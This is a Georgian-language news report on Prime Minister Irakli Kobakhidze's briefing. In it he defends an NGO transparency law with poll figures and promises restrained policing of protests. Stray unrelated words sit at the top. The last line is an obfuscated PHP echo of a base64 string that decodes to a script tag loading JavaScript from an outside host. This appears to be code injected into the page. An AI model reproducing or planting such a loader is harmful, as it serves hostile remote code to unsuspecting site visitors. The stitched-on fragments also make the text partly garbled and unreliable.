celsiusi
ავერსი შნაიდერი

 ჩვენ უნდა გავყვეთ საზოგადოების უმრავლესობის ნებას, რასაც წყვეტს უმრავლესობა, მით უმეტეს, რომ ეს არის რაციონალური გადაწყვეტილება. ის გადაწყვეტილება უნდა იყოს ასახული პარლამენტის მიერ გამოცემულ აქტში, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ დღევანდელ ბრიფინგზე განაცხადა.

როგორც ირაკლი კობახიძემ აღნიშნა, შინაგან საქმეთა სამინისტრო იმოქმედებს არა ევროპული სტანდარტებით, არამედ ევროპულზე და ამერიკულზე მაღალი სტანდარტით და ეს არის დღევანდელი ხელისუფლების ხელწერა.

„შინაგან საქმეთა სამინისტრო ყველაფერს გააკეთებს, რათა მოხდეს ძალადობის პრევენცია, თუმცა შეუძლებელია ამის სრულად გამორიცხვა. თუ ძალადობა არის დაგეგმილი, ყველაფერს გააკეთებენ შესაბამისი რადიკალური ძალები, რომ ძალადობა განხორციელდეს. მთავარია, შინაგან საქმეთა სამინისტრო ამ შემთხვევაშიც იმოქმედებს არა ევროპული სტანდარტებით, არამედ ევროპულზე და ამერიკულზე მაღალი სტანდარტებით, ეს არის ჩვენი, დღევანდელი ხელისუფლების ხელწერა და კონკრეტულად სამართალდამცველი ორგანოების, რითაც განსხვავდება დღევანდელი შსს მაგალითად, მერაბიშვილის და გახარიას მოქმედებებისგან. ეს არის სტანდარტი, რომელიც აუცილებლად იქნება დაცული, შსს-ს მიერ ყველაფერი გაკეთდება პრევენციისთვის“, – განაცხადა პრემიერ-მინისტრმა.

მისივე თქმით, მაღალი კვალიფიკაციით გამორჩეულმა გუნდმა ჩაატარა სოციოლოგიური კვლევა, რომლის მიხედვითაც, 80 პროცენტზე მეტი მხარს უჭერს არასამთავრობო ორგანიზაციების საქმიანობის გამჭვირვალობას.

„რაც შეეხება უმრავლესობას და უმცირესობას – ჩვენ ჩავატარეთ სოციოლოგიური კვლევა, ეს კვლევა ჩაატარა ერთ-ერთმა კომპეტენტურმა, მე არ დავასახელებ, შეგიძლიათ, დაახლოებით თქვენ ივარაუდოთ, ვისთან შეიძლება ვმუშაობდეთ ჩვენ, მაგრამ ეს არის ერთ-ერთი მაღალი კვალიფიკაციით გამორჩეული გუნდისგან შემდგარი ორგანიზაცია. კიდევ ერთხელ გავიმეორებ, 80 პროცენტზე მეტი მხარს უჭერს არასამთავრობო ორგანიზაციების საქმიანობის გამჭვირვალობას, როცა უშუალოდ კანონთან დაკავშირებით დაისვა კითხვა, ზუსტად 61 პროცენტი დაფიქსირდა მხარდაჭერა ამ შემთხვევაში. შესაბამისად, ყველა ვხედავთ, სად არის საზოგადოების მხარდაჭერა.

რაც შეეხება აქციებს, მინდა, შეგახსენოთ, რომ ჩვენს აქციაზე, იგივე გუშინდელთან შედარებით, რამდენჯერმე მეტი ადამიანი იყო გამოსული, რაც ასევე აჩვენებს თანაფარდობას. აქედან გამომდინარე, ცალსახად შეიძლება თქმა, რომ ჩვენ უნდა გავყვეთ საზოგადოების უმრავლესობის ნებას, რასაც წყვეტს უმრავლესობა, მით უმეტეს, რომ ეს არის რაციონალური გადაწყვეტილება, ის გადაწყვეტილება უნდა იყოს ასახული პარლამენტის მიერ გამოცემულ აქტში“, – განაცხადა ირაკლი კობახიძემ.

189
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");